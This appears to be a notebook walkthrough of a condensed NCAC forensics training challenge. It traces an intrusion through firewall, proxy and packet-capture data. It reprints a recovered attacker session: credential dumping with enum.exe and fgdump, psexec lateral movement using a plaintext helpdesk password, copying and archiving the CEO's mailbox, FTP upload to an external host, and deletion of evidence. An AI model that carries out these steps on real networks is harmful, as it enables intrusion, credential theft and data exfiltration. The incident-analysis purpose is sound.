## Mini NCAC Challenge

This is condensed version of the NCAC challenge. It should take a little less than 3 hours to complete as opposed to 50 hours. Thus, a lot of the data will be reducted and hints/pointers will be given.



### Instructions / Indicators

The FBI called to inform you they noticed traffic from your company to a known bad APT drop site. Details were sketchy and sparse as usual; however, the FBI indicated that it observed a file “d.7z” being transferred. No analysis of the contents of the file was conducted (or they didn’t care to share).

Although there is no evidence the attackers used email as a delivery vector, the FBI indicated this particular adversary regularly uses career-type themes to target job seekers and HR personnel. Previously observed email Subjects were:


“Your CV has been updated”  
“Take career to your level next”   
“Tried of grind”   
“opportunity waits”  

No other information is available at this time.   




### Step 1. 

We have some useful border device logs. Let's start by searching them for the indicator we were given. I will do a grep search for "d.7z" accross all three logs within that folder. It looks like one of our users (10.10.54.111/3504) downloaded this file from a web server using FTP (203.57.206.173/21).

10.10.51.111 is the address of the DMZ web server so we don't yet know which user is implicated.

These are two useful IP addresses we can now investigate. Assuming timestamps have no been manipulated, we can also take  look at the time around which this event occurred. 

In [2]:
grep -r  'd\.7z' /Users/simeonkakpovi/Documents/cyber/ncac_2015_data/Border\ Device\ Logs/ --color=always 

/Users/simeonkakpovi/Documents/cyber/ncac_2015_data/Border Device Logs//firewall.log:Mar  8 21:00:56 siccofw01 : %PIX-6-303002: FTP connection from inside:10.10.54.111/3504 to outside:203.57.206.173/21, user root Retrieved file d.7z


### Step 2. 

That external IP address seems like it may be adversary infrastructure. Let's grep through all the logs for all interactions with that IP address. Perhaps there are other things we downloaded from it. 

Within the squid proxy, it looks like this IP address was hosting jobs.securityintelligence[.]com. One of our users (10.10.54.111) browsed to its and downloaded a file conviniently named "Exploit.jar" (a compile java file). We also see the user downloading "d11host.exe" directly from the IP address. 

Within the firewall logs, we see that "d.7z" is not the only file they downloaded. They also retrieved "7.za", "d.7z", "a.7z", and "b.7z". These are all zip files which I will assume contain malicious content.



In [6]:
grep -r  203.57.206.173 /Users/simeonkakpovi/Documents/cyber/ncac_2015_data/Border\ Device\ Logs/ --color=always | sed 

/Users/simeonkakpovi/Documents/cyber/ncac_2015_data/Border Device Logs//squid_proxy.log:1331159211.915     18 10.10.54.111 TCP_MISS/302 239 GET http://jobs.securityintelligence.com:8080/css - DIRECT/203.57.206.173 text/html
/Users/simeonkakpovi/Documents/cyber/ncac_2015_data/Border Device Logs//squid_proxy.log:1331159211.927      8 10.10.54.111 TCP_MISS/200 329 GET http://jobs.securityintelligence.com:8080/css/ - DIRECT/203.57.206.173 text/html
/Users/simeonkakpovi/Documents/cyber/ncac_2015_data/Border Device Logs//squid_proxy.log:1331159213.331      6 10.10.54.111 TCP_MISS/404 368 GET http://jobs.securityintelligence.com:8080/favicon.ico - DIRECT/203.57.206.173 text/html
/Users/simeonkakpovi/Documents/cyber/ncac_2015_data/Border Device Logs//squid_proxy.log:1331159217.340   1292 10.10.54.111 TCP_MISS/200 50725 GET http://jobs.securityintelligence.com:8080/css/Exploit.jar - DIRECT/203.57.206.173 application/octet-stream
/Users/simeonkakpovi/Documents/cyber/ncac_2015_data/Border Device 

### Step 3.


Now I will move on the network traffic to see if can get more information on the conversation between these two ip addresses. I prefer to use t-shark, which is the command line version of wireshark before it will yield my results a bit faster. However, I will also use good old wireshark for inspecting specific conversations and extracting payloads. 

The pcap files are split into several pieces to make them more manageable. I will not attempt to reassemble them. Instead, I will read them in using t-shark and run a simple grep for the suspect IP address.

The "-r" flag allows us to specify and input file

It looks like 4_3_2.pcap is the first file to contain the IP address we are looking for (203.57.206.173).  
But so do 4_5.pcap. 
4_6.pcap shows d11host.exe being downloaded.  
4_7.pcap has DNS queries to the IP addrsss
4_final has activity.

In [ ]:
# tshark -r /Users/simeonkakpovi/Documents/cyber/ncac_2015_data/Network-pcaps/4_3_2.pcap | grep 203.57.206.173 | less
#tshark -r 4_5.pcap | grep 203.57.206.173 | less
#tshark -r 4_6.pcap | grep 203.57.206.173 | less

### Step 4. 

I will start by opening up 4_3_2.pcap in wireshark and I will apply a filter to isolated the traffic from our suspected IP address. 

ip.addr == 203.57.206.173

In the settings, I will click analyz > Follow > tcp stream. 

The results should be as follow below 

```
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\droskow>
```

This starts to give us an idea of who to suspect. If you look back at our organization chart, Darren Roscow is the Security adminstrator. Why in the world is he interacting with this IP address?

### Step 5.
Doing the same thing in 4_5.pcap gives us more detailed output on what was occuring.

This appears to the command and control channel (activity) of the adversary. Reading this in details will give us a better picture of what they did and what their goals were. Clearly, they are operating on Darren Roskow's machine. 


Long story short, he enumates the network, logs on to the CEO's machine, compreses all the CEO's emails and mails them back to himself. 

```
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\droskow>cd C:\Windows\WBEM\
cd C:\Windows\WBEM\

C:\WINDOWS\WBEM>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 08FE-2AA7

 Directory of C:\WINDOWS\WBEM

03/08/2012  09:11 PM    <DIR>          .
03/08/2012  09:11 PM    <DIR>          ..
03/08/2012  09:08 PM               226 10.10.53.2.cachedump
03/08/2012  09:08 PM             5,973 10.10.53.2.pwdump
03/08/2012  09:08 PM               714 2012-03-09-02-08-20.fgdump-log
03/08/2012  09:00 PM           587,776 7za.exe
03/06/2012  02:34 PM            73,802 asdf.exe
03/06/2012  02:41 PM            49,152 cachedump.exe
03/08/2012  09:00 PM         1,098,540 d.7z
03/06/2012  02:41 PM            49,152 enum.exe
03/08/2012  09:12 PM    <DIR>          F1
03/06/2012  02:41 PM           974,848 fgdump.exe
03/08/2012  09:11 PM                85 ftp_bye.txt
03/08/2012  09:00 PM               100 ftp_helo.txt
03/06/2012  10:34 PM            94,208 HoboCopy.exe
01/07/2009  06:21 PM             1,876 msfeeds.mof
01/07/2009  06:21 PM             1,938 msfeedsbs.mof
03/06/2012  02:41 PM            59,392 nc.exe
03/06/2012  02:41 PM           146,704 pdh.dll
03/06/2012  02:41 PM           229,376 plink.exe
03/06/2012  02:42 PM           131,072 psexec.exe
03/06/2012  11:23 PM            94,208 pskill.exe
02/23/2012  11:12 AM             8,704 taskhosts.exe
03/06/2012  03:48 PM           200,779 UserInfo.exe
03/06/2012  02:42 PM           308,736 wget.exe
              22 File(s)      4,117,361 bytes
               3 Dir(s)   7,726,002,176 bytes free

C:\WINDOWS\WBEM>net view
net view
Server Name            Remark

-------------------------------------------------------------------------------
\\SICCO38K16           Marsellus Wallace Workstation                           
\\SICCO446EQ           Darren Roskow Laptop                                    
\\SICCO4IF54           Lando Calrissian Laptop                                 
\\SICCO4U9BJ           Martin Bishops Laptop                                   
\\SICCO8BF37           Stanley Jobson Laptop                                   
\\SICCO9AD70           Ellen Ripley Laptop                                     
\\SICCOHJ8Q1           Vincent Vega Laptop                                     
\\SICCOM4094           Ramon Sanchez Laptop                                    
\\SICCORV5LN           Hugo Stiglitz Workstation                               
\\SICCOSVR01                                                                   
\\SICCOSVR02                                                                   
\\SICCOSVR04                                                                   
\\SICCOSVR05                                                                   
\\SICCOT53Q2           Donny Kerabatsos Laptop                                 
\\SICCOVZGZ5           Jules Winnfield Laptop                                  
The command completed successfully.


C:\WINDOWS\WBEM>net use
net use
New connections will be remembered.


Status       Local     Remote                    Network

-------------------------------------------------------------------------------
Disconnected S:        \\10.10.53.180\share      Microsoft Windows Network
The command completed successfully.


C:\WINDOWS\WBEM>net use * \\SICCO4U9BJ\C$ /u:SICCOINC\Helpdesk H3lp0M3!!
net use * \\SICCO4U9BJ\C$ /u:SICCOINC\Helpdesk H3lp0M3!!
Drive Z: is now connected to \\SICCO4U9BJ\C$.

The command completed successfully.


C:\WINDOWS\WBEM>net use
net use
New connections will be remembered.


Status       Local     Remote                    Network

-------------------------------------------------------------------------------
Disconnected S:        \\10.10.53.180\share      Microsoft Windows Network
OK           Z:        \\SICCO4U9BJ\C$           Microsoft Windows Network
The command completed successfully.


C:\WINDOWS\WBEM>Z:
Z:

Z:\>dir
dir
 Volume in drive Z has no label.
 Volume Serial Number is 227B-5441

 Directory of Z:\

07/13/2009  10:20 PM    <DIR>          PerfLogs
02/22/2012  03:49 PM    <DIR>          Program Files
02/22/2012  03:37 PM    <DIR>          Program Files (x86)
03/07/2012  10:09 AM    <DIR>          Users
02/03/2012  10:20 AM    <DIR>          Windows
               0 File(s)              0 bytes
               5 Dir(s)   7,417,139,200 bytes free

Z:\>cd Users
cd Users

Z:\Users>dir
dir
 Volume in drive Z has no label.
 Volume Serial Number is 227B-5441

 Directory of Z:\Users

03/07/2012  10:09 AM    <DIR>          .
03/07/2012  10:09 AM    <DIR>          ..
01/25/2012  11:48 AM    <DIR>          a-root
08/02/2011  12:31 AM    <DIR>          Administrator
03/05/2012  01:06 PM    <DIR>          administrator.SICCOINC
02/03/2012  01:40 PM    <DIR>          eadams
03/07/2012  10:09 AM    <DIR>          hstiglitz
02/14/2012  03:47 PM    <DIR>          mbishop
07/13/2009  11:59 PM    <DIR>          Public
02/03/2012  12:42 PM    <DIR>          sattaq
               0 File(s)              0 bytes
              10 Dir(s)   7,417,139,200 bytes free

Z:\Users>cd mbishop
cd mbishop

Z:\Users\mbishop>dir
dir
 Volume in drive Z has no label.
 Volume Serial Number is 227B-5441

 Directory of Z:\Users\mbishop

02/14/2012  03:47 PM    <DIR>          .
02/14/2012  03:47 PM    <DIR>          ..
02/14/2012  03:47 PM    <DIR>          Contacts
02/22/2012  03:56 PM    <DIR>          Desktop
03/07/2012  10:51 AM    <DIR>          Documents
02/14/2012  03:47 PM    <DIR>          Downloads
02/14/2012  03:47 PM    <DIR>          Favorites
02/14/2012  03:47 PM    <DIR>          Links
02/14/2012  03:47 PM    <DIR>          Music
02/14/2012  03:47 PM    <DIR>          Pictures
02/14/2012  03:47 PM    <DIR>          Saved Games
02/15/2012  09:05 AM    <DIR>          Searches
02/14/2012  03:47 PM    <DIR>          Videos
               0 File(s)              0 bytes
              13 Dir(s)   7,417,139,200 bytes free

Z:\Users\mbishop>cd Documents
cd Documents

Z:\Users\mbishop\Documents>dir
dir
 Volume in drive Z has no label.
 Volume Serial Number is 227B-5441

 Directory of Z:\Users\mbishop\Documents

03/07/2012  10:51 AM    <DIR>          .
03/07/2012  10:51 AM    <DIR>          ..
03/08/2012  09:34 PM    <DIR>          Outlook Files
               0 File(s)              0 bytes
               3 Dir(s)   7,417,139,200 bytes free

Z:\Users\mbishop\Documents>cd Outlook Files
cd Outlook Files

Z:\Users\mbishop\Documents\Outlook Files>dir
dir
 Volume in drive Z has no label.
 Volume Serial Number is 227B-5441

 Directory of Z:\Users\mbishop\Documents\Outlook Files

03/08/2012  09:34 PM    <DIR>          .
03/08/2012  09:34 PM    <DIR>          ..
03/08/2012  09:34 PM        38,618,112 My Outlook Data File.pst
               1 File(s)     38,618,112 bytes
               2 Dir(s)   7,417,139,200 bytes free

Z:\Users\mbishop\Documents\Outlook Files>copy "My Outlook Data File.pst" C:\Windows\WBEM\
copy "My Outlook Data File.pst" C:\Windows\WBEM\
        1 file(s) copied.

Z:\Users\mbishop\Documents\Outlook Files>cd ..
cd ..

Z:\Users\mbishop\Documents>cd ..
cd ..

Z:\Users\mbishop>cd ..
cd ..

Z:\Users>cd ..
cd ..

Z:\>dir /s /b > mbish.txt
dir /s /b > mbish.txt

Z:\>dir
dir
 Volume in drive Z has no label.
 Volume Serial Number is 227B-5441

 Directory of Z:\

03/08/2012  09:46 PM        12,200,040 mbish.txt
07/13/2009  10:20 PM    <DIR>          PerfLogs
02/22/2012  03:49 PM    <DIR>          Program Files
02/22/2012  03:37 PM    <DIR>          Program Files (x86)
03/07/2012  10:09 AM    <DIR>          Users
02/03/2012  10:20 AM    <DIR>          Windows
               1 File(s)     12,200,040 bytes
               5 Dir(s)   7,404,937,216 bytes free

Z:\>copy mbish.txt C:\Windows\WBEM\
copy mbish.txt C:\Windows\WBEM\
        1 file(s) copied.

Z:\>del mbish.txt
del mbish.txt

Z:\>dir
dir
 Volume in drive Z has no label.
 Volume Serial Number is 227B-5441

 Directory of Z:\

07/13/2009  10:20 PM    <DIR>          PerfLogs
02/22/2012  03:49 PM    <DIR>          Program Files
02/22/2012  03:37 PM    <DIR>          Program Files (x86)
03/07/2012  10:09 AM    <DIR>          Users
02/03/2012  10:20 AM    <DIR>          Windows
               0 File(s)              0 bytes
               5 Dir(s)   7,417,139,200 bytes free

Z:\>C:
C:

C:\WINDOWS\WBEM>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 08FE-2AA7

 Directory of C:\WINDOWS\WBEM

03/08/2012  09:46 PM    <DIR>          .
03/08/2012  09:46 PM    <DIR>          ..
03/08/2012  09:08 PM               226 10.10.53.2.cachedump
03/08/2012  09:08 PM             5,973 10.10.53.2.pwdump
03/08/2012  09:08 PM               714 2012-03-09-02-08-20.fgdump-log
03/08/2012  09:00 PM           587,776 7za.exe
03/06/2012  02:34 PM            73,802 asdf.exe
03/06/2012  02:41 PM            49,152 cachedump.exe
03/08/2012  09:00 PM         1,098,540 d.7z
03/06/2012  02:41 PM            49,152 enum.exe
03/08/2012  09:12 PM    <DIR>          F1
03/06/2012  02:41 PM           974,848 fgdump.exe
03/08/2012  09:11 PM                85 ftp_bye.txt
03/08/2012  09:00 PM               100 ftp_helo.txt
03/06/2012  10:34 PM            94,208 HoboCopy.exe
03/08/2012  09:46 PM        12,200,040 mbish.txt
01/07/2009  06:21 PM             1,876 msfeeds.mof
01/07/2009  06:21 PM             1,938 msfeedsbs.mof
03/08/2012  09:34 PM        38,618,112 My Outlook Data File.pst
03/06/2012  02:41 PM            59,392 nc.exe
03/06/2012  02:41 PM           146,704 pdh.dll
03/06/2012  02:41 PM           229,376 plink.exe
03/06/2012  02:42 PM           131,072 psexec.exe
03/06/2012  11:23 PM            94,208 pskill.exe
02/23/2012  11:12 AM             8,704 taskhosts.exe
03/06/2012  03:48 PM           200,779 UserInfo.exe
03/06/2012  02:42 PM           308,736 wget.exe
              24 File(s)     54,935,513 bytes
               3 Dir(s)   7,675,097,088 bytes free

C:\WINDOWS\WBEM>mkdir F2
mkdir F2

C:\WINDOWS\WBEM>copy *.pst F2\
copy *.pst F2\
My Outlook Data File.pst
        1 file(s) copied.

C:\WINDOWS\WBEM>copy ftp* F2\
copy ftp* F2\
ftp_bye.txt
ftp_helo.txt
        2 file(s) copied.

C:\WINDOWS\WBEM>copy 7za.exe F2\
copy 7za.exe F2\
        1 file(s) copied.

C:\WINDOWS\WBEM>copy mbish.txt F2\
copy mbish.txt F2\
        1 file(s) copied.

C:\WINDOWS\WBEM>cd F2
cd F2

C:\WINDOWS\WBEM\F2>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 08FE-2AA7

 Directory of C:\WINDOWS\WBEM\F2

03/08/2012  09:48 PM    <DIR>          .
03/08/2012  09:48 PM    <DIR>          ..
03/08/2012  09:00 PM           587,776 7za.exe
03/08/2012  09:11 PM                85 ftp_bye.txt
03/08/2012  09:00 PM               100 ftp_helo.txt
03/08/2012  09:46 PM        12,200,040 mbish.txt
03/08/2012  09:34 PM        38,618,112 My Outlook Data File.pst
               5 File(s)     51,406,113 bytes
               2 Dir(s)   7,623,684,096 bytes free

C:\WINDOWS\WBEM\F2>7za.exe a b.7z mbish.txt "My Outlook Data File.pst"
7za.exe a b.7z mbish.txt "My Outlook Data File.pst"

7-Zip (A) 9.20  Copyright (c) 1999-2010 Igor Pavlov  2010-11-18
Scanning

Creating archive b.7z

Compressing  mbish.txt
Compressing  My Outlook Data File.pst

Everything is Ok

C:\WINDOWS\WBEM\F2>ftp -i -s:ftp_bye.txt
ftp -i -s:ftp_bye.txt
User (203.57.206.173:(none)): open 203.57.206.173


bin
cd dump/
mput "*.7z"
disconnect
bye

C:\WINDOWS\WBEM\F2>net use
net use
New connections will be remembered.


Status       Local     Remote                    Network

-------------------------------------------------------------------------------
Disconnected S:        \\10.10.53.180\share      Microsoft Windows Network
OK           Z:        \\SICCO4U9BJ\C$           Microsoft Windows Network
The command completed successfully.


C:\WINDOWS\WBEM\F2>net use Z: /del /y
net use Z: /del /y
Z: was deleted successfully.


C:\WINDOWS\WBEM\F2>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 08FE-2AA7

 Directory of C:\WINDOWS\WBEM\F2

03/08/2012  09:48 PM    <DIR>          .
03/08/2012  09:48 PM    <DIR>          ..
03/08/2012  09:00 PM           587,776 7za.exe
03/08/2012  09:49 PM         4,471,542 b.7z
03/08/2012  09:11 PM                85 ftp_bye.txt
03/08/2012  09:00 PM               100 ftp_helo.txt
03/08/2012  09:46 PM        12,200,040 mbish.txt
03/08/2012  09:34 PM        38,618,112 My Outlook Data File.pst
               6 File(s)     55,877,655 bytes
               2 Dir(s)   7,619,137,536 bytes free

C:\WINDOWS\WBEM\F2>del *
del *
C:\WINDOWS\WBEM\F2\*, Are you sure (Y/N)? Y
Y

C:\WINDOWS\WBEM\F2>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 08FE-2AA7

 Directory of C:\WINDOWS\WBEM\F2

03/08/2012  09:50 PM    <DIR>          .
03/08/2012  09:50 PM    <DIR>          ..
               0 File(s)              0 bytes
               2 Dir(s)   7,675,023,360 bytes free

C:\WINDOWS\WBEM\F2>cd ..
cd ..

C:\WINDOWS\WBEM>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 08FE-2AA7

 Directory of C:\WINDOWS\WBEM

03/08/2012  09:47 PM    <DIR>          .
03/08/2012  09:47 PM    <DIR>          ..
03/08/2012  09:08 PM               226 10.10.53.2.cachedump
03/08/2012  09:08 PM             5,973 10.10.53.2.pwdump
03/08/2012  09:08 PM               714 2012-03-09-02-08-20.fgdump-log
03/08/2012  09:00 PM           587,776 7za.exe
03/06/2012  02:34 PM            73,802 asdf.exe
03/06/2012  02:41 PM            49,152 cachedump.exe
03/08/2012  09:00 PM         1,098,540 d.7z
03/06/2012  02:41 PM            49,152 enum.exe
03/08/2012  09:12 PM    <DIR>          F1
03/08/2012  09:50 PM    <DIR>          F2
03/06/2012  02:41 PM           974,848 fgdump.exe
03/08/2012  09:11 PM                85 ftp_bye.txt
03/08/2012  09:00 PM               100 ftp_helo.txt
03/06/2012  10:34 PM            94,208 HoboCopy.exe
03/08/2012  09:46 PM        12,200,040 mbish.txt
01/07/2009  06:21 PM             1,876 msfeeds.mof
01/07/2009  06:21 PM             1,938 msfeedsbs.mof
03/08/2012  09:34 PM        38,618,112 My Outlook Data File.pst
03/06/2012  02:41 PM            59,392 nc.exe
03/06/2012  02:41 PM           146,704 pdh.dll
03/06/2012  02:41 PM           229,376 plink.exe
03/06/2012  02:42 PM           131,072 psexec.exe
03/06/2012  11:23 PM            94,208 pskill.exe
02/23/2012  11:12 AM             8,704 taskhosts.exe
03/06/2012  03:48 PM           200,779 UserInfo.exe
03/06/2012  02:42 PM           308,736 wget.exe
              24 File(s)     54,935,513 bytes
               4 Dir(s)   7,675,023,360 bytes free

C:\WINDOWS\WBEM>del *.exe
del *.exe
C:\WINDOWS\WBEM\asdf.exe
Access is denied.

C:\WINDOWS\WBEM>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 08FE-2AA7

 Directory of C:\WINDOWS\WBEM

03/08/2012  09:51 PM    <DIR>          .
03/08/2012  09:51 PM    <DIR>          ..
03/08/2012  09:08 PM               226 10.10.53.2.cachedump
03/08/2012  09:08 PM             5,973 10.10.53.2.pwdump
03/08/2012  09:08 PM               714 2012-03-09-02-08-20.fgdump-log
03/06/2012  02:34 PM            73,802 asdf.exe
03/08/2012  09:00 PM         1,098,540 d.7z
03/08/2012  09:12 PM    <DIR>          F1
03/08/2012  09:50 PM    <DIR>          F2
03/08/2012  09:11 PM                85 ftp_bye.txt
03/08/2012  09:00 PM               100 ftp_helo.txt
03/08/2012  09:46 PM        12,200,040 mbish.txt
01/07/2009  06:21 PM             1,876 msfeeds.mof
01/07/2009  06:21 PM             1,938 msfeedsbs.mof
03/08/2012  09:34 PM        38,618,112 My Outlook Data File.pst
03/06/2012  02:41 PM           146,704 pdh.dll
              12 File(s)     52,148,110 bytes
               4 Dir(s)   7,677,825,024 bytes free

C:\WINDOWS\WBEM>del *.txt 
del *.txt 

C:\WINDOWS\WBEM>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 08FE-2AA7

 Directory of C:\WINDOWS\WBEM

03/08/2012  09:51 PM    <DIR>          .
03/08/2012  09:51 PM    <DIR>          ..
03/08/2012  09:08 PM               226 10.10.53.2.cachedump
03/08/2012  09:08 PM             5,973 10.10.53.2.pwdump
03/08/2012  09:08 PM               714 2012-03-09-02-08-20.fgdump-log
03/06/2012  02:34 PM            73,802 asdf.exe
03/08/2012  09:00 PM         1,098,540 d.7z
03/08/2012  09:12 PM    <DIR>          F1
03/08/2012  09:50 PM    <DIR>          F2
01/07/2009  06:21 PM             1,876 msfeeds.mof
01/07/2009  06:21 PM             1,938 msfeedsbs.mof
03/08/2012  09:34 PM        38,618,112 My Outlook Data File.pst
03/06/2012  02:41 PM           146,704 pdh.dll
               9 File(s)     39,947,885 bytes
               4 Dir(s)   7,690,027,008 bytes free

C:\WINDOWS\WBEM>del *.pst *.dll *.cachedump *.pwdump
del *.pst *.dll *.cachedump *.pwdump

C:\WINDOWS\WBEM>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 08FE-2AA7

 Directory of C:\WINDOWS\WBEM

03/08/2012  09:52 PM    <DIR>          .
03/08/2012  09:52 PM    <DIR>          ..
03/08/2012  09:08 PM               714 2012-03-09-02-08-20.fgdump-log
03/06/2012  02:34 PM            73,802 asdf.exe
03/08/2012  09:00 PM         1,098,540 d.7z
03/08/2012  09:12 PM    <DIR>          F1
03/08/2012  09:50 PM    <DIR>          F2
01/07/2009  06:21 PM             1,876 msfeeds.mof
01/07/2009  06:21 PM             1,938 msfeedsbs.mof
               5 File(s)      1,176,870 bytes
               4 Dir(s)   7,728,803,840 bytes free

C:\WINDOWS\WBEM>del *.fgdump-log
del *.fgdump-log

C:\WINDOWS\WBEM>del F1
del F1
C:\WINDOWS\WBEM\F1\*, Are you sure (Y/N)? y
y

C:\WINDOWS\WBEM>del F2
del F2
C:\WINDOWS\WBEM\F2\*, Are you sure (Y/N)? Y
Y

C:\WINDOWS\WBEM>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 08FE-2AA7

 Directory of C:\WINDOWS\WBEM

03/08/2012  09:52 PM    <DIR>          .
03/08/2012  09:52 PM    <DIR>          ..
03/06/2012  02:34 PM            73,802 asdf.exe
03/08/2012  09:00 PM         1,098,540 d.7z
03/08/2012  09:52 PM    <DIR>          F1
03/08/2012  09:50 PM    <DIR>          F2
01/07/2009  06:21 PM             1,876 msfeeds.mof
01/07/2009  06:21 PM             1,938 msfeedsbs.mof
               4 File(s)      1,176,156 bytes
               4 Dir(s)   7,729,410,048 bytes free

C:\WINDOWS\WBEM>exit
exit
```

### Step 6.

One thing that interested me was that they somehow got access to a helpdeks password that they used during their commands. I wonder how they got it. To find out, I will use a different tool called "Ngrep" to quickly parse through the pcap files for my desired string

```
$ ngrep -q -I 4_3_1.pcap -W byline  "H3lp0M3"  
input: 4_3_1.pcap
match: H3lp0M3

U 10.10.54.111:3524 -> 10.10.53.2:88
j..60..2.........
.d0b0M......F.D0B...........6.4.D....!b;..`P=......D..$.Xd..G...g..G....QJ].......\0...........0.........0.......@.....0........0...H3lp0M3!!....SICCOINC.COM.!0........0...krbtgt..SICCOINC.COM....20370913024805Z....20370913024805Z....L..0..0.......{...............y..0.0..........SICCO446EQ      

U 10.10.54.111:3525 -> 10.10.53.2:88
j..60..2.........
.d0b0M......F.D0B...........6.4.D....!b;..`P=......D..$.Xd..G...g..G....QJ].......\0...........0.........0.......@.....0........0...H3lp0M3!!....SICCOINC.COM.!0........0...krbtgt..SICCOINC.COM....20370913024805Z....20370913024805Z....L..0..0.......{...............y..0.0..........SICCO446EQ 
```

** We've seen 10.10.54.111, but not 10.10.53.2.
Going back to wireshark, I will investigate further using the appropriate filters. Port 88 is for the KDC (Kerberos key distribution center) server, so this may not be so interesting after all.**




We have better luck in 4_5.pcap 

```
$ ngrep -q -I 4_5.pcap -W byline  "H3lp0M3"  
input: 4_5.pcap
match: H3lp0M3

T 203.57.206.173:443 -> 10.10.54.111:3509 [AP]
enum.exe -U -M -N -S -P -G -L -u Helpdesk -u H3lp0M3!! 10.10.53.2


T 10.10.54.111:3509 -> 203.57.206.173:443 [AP]
enum.exe -U -M -N -S -P -G -L -u Helpdesk -u H3lp0M3!! 10.10.53.2


T 10.10.54.111:3509 -> 203.57.206.173:443 [AP]
username: Helpdesk.
username: H3lp0M3!!.
server: 10.10.53.2.
setting up session... fail..
return 1326, Logon failure: unknown user name or bad password...


T 203.57.206.173:443 -> 10.10.54.111:3509 [AP]
enum.exe -U -M -N -S -P -G -L -u Helpdesk -p H3lp0M3!! 10.10.53.2


T 10.10.54.111:3509 -> 203.57.206.173:443 [AP]
enum.exe -U -M -N -S -P -G -L -u Helpdesk -p H3lp0M3!! 10.10.53.2


T 10.10.54.111:3509 -> 203.57.206.173:443 [AP]
username: Helpdesk.
password: H3lp0M3!!.
server: 10.10.53.2.
setting up session... success..
password policy:.
  min length: 7 chars.
  min age: 1 days.
  max age: 42 days.
  lockout threshold: none.
  lockout duration: 30 mins.
  lockout reset: 30 mins.
opening lsa policy... success..
server role: 3 [primary (unknown)].
names:.
  netbios: SICCOINC.
  domain: SICCOINC.
quota:.
  paged pool limit: 33554432.
  non paged pool limit: 1048576.
  min work set size: 65536.
  max work set size: 251658240.
  pagefile limit: 688536.
  time limit: 0.
trusted domains:.
  indeterminate.
netlogon done by a PDC server.
getting namelist (pass 1)... got 46, 4 left:.
  Administrator  Guest  krbtgt  SUPPORT_388945a0  ASPNET  a-root  share.
  mbishop  dkerabatsos  mwallace  jwinnfield  hstiglitz  ejohnson  droskow.
  lsalander  pvenkman  rstantz  twebb  cspackler  eripley  kflynn  dmurphy.
  rsanchez  pcook  klibby  tanderson  lcalrissian  sjobson  vvega  awaves.
  CIRT  helpdesk  SICCOSVR01$  SICCO4U9BJ$  SICCO4IF54$  SICCOHJ8Q

T 203.57.206.173:443 -> 10.10.54.111:3509 [AP]
fgdump.exe -h 10.10.53.2 -u Helpdesk -p H3lp0M3!!


T 10.10.54.111:3509 -> 203.57.206.173:443 [AP]
fgdump.exe -h 10.10.53.2 -u Helpdesk -p H3lp0M3!!


T 203.57.206.173:443 -> 10.10.54.111:3509 [AP]
psexec.exe \\SICCOVZGZ5 -u Helpdesk -p H3lp0M3!! tasklist


T 10.10.54.111:3509 -> 203.57.206.173:443 [AP]
psexec.exe \\SICCOVZGZ5 -u Helpdesk -p H3lp0M3!! tasklist


T 203.57.206.173:443 -> 10.10.54.111:3509 [AP]
psexec.exe \\SICCOVZGZ5 -u SICCOINC\Helpdesk -p H3lp0M3!! tasklist


T 10.10.54.111:3509 -> 203.57.206.173:443 [AP]
psexec.exe \\SICCOVZGZ5 -u SICCOINC\Helpdesk -p H3lp0M3!! tasklist


T 203.57.206.173:443 -> 10.10.54.111:3509 [AP]
psexec.exe \\SICCOVZGZ5 -u SICCOINC\Helpdesk -p H3lp0M3!! -c -d taskhosts.exe


T 10.10.54.111:3509 -> 203.57.206.173:443 [AP]
psexec.exe \\SICCOVZGZ5 -u SICCOINC\Helpdesk -p H3lp0M3!! -c -d taskhosts.exe


T 203.57.206.173:443 -> 10.10.54.111:3509 [AP]
psexec.exe \\SICCORV5LN -u SICCOINC\Helpdesk -p H3lp0M3!! -c -d taskhosts.exe


T 10.10.54.111:3509 -> 203.57.206.173:443 [AP]
psexec.exe \\SICCORV5LN -u SICCOINC\Helpdesk -p H3lp0M3!! -c -d taskhosts.exe


T 203.57.206.173:443 -> 10.10.54.111:3509 [AP]
psexec.exe \\SICCORV5LN -u SICCOINC\Helpdesk -p H3lp0M3!! tasklist


T 10.10.54.111:3509 -> 203.57.206.173:443 [AP]
psexec.exe \\SICCORV5LN -u SICCOINC\Helpdesk -p H3lp0M3!! tasklist


T 203.57.206.173:443 -> 10.10.54.111:3509 [AP]
psexec.exe \\SICCORV5LN -u SICCOINC\Helpdesk -p H3lp0M3!! ipconfig


T 10.10.54.111:3509 -> 203.57.206.173:443 [AP]
psexec.exe \\SICCORV5LN -u SICCOINC\Helpdesk -p H3lp0M3!! ipconfig


T 203.57.206.173:443 -> 10.10.54.111:3575 [AP]
net use * \\SICCO4U9BJ\C$ /u:SICCOINC\Helpdesk H3lp0M3!!


T 10.10.54.111:3575 -> 203.57.206.173:443 [AP]
net use * \\SICCO4U9BJ\C$ /u:SICCOINC\Helpdesk H3lp0M3!!
```

## TODO

* investigate 60.235.12.64

** Investigating all IP addresses associated with securityintelligence **

```
$ grep -r "securityintelligence.com" . | awk -F ' ' '{ print $3, $9}' |  sed -e 's/DIRECT/--> /g' | histogram 
 100 10.10.54.111 --> /60.235.12.64
  24 queries: IN
  23 10.10.54.100 --> /208.82.16.68    <---ignore this (opensecurityintelligence.com)
  13 10.10.54.111 --> /203.57.206.173
   1 10.10.54.111 --> /securityintelligence.com
```

### Following the 203 address in 4_3_2

```
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\droskow>cd C:\Windows\WBEM\
cd C:\Windows\WBEM\

C:\WINDOWS\WBEM>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 08FE-2AA7

 Directory of C:\WINDOWS\WBEM

03/08/2012  09:01 PM    <DIR>          .
03/08/2012  09:01 PM    <DIR>          ..
03/08/2012  09:00 PM           587,776 7za.exe
03/06/2012  02:34 PM            73,802 asdf.exe
03/06/2012  02:41 PM            49,152 cachedump.exe
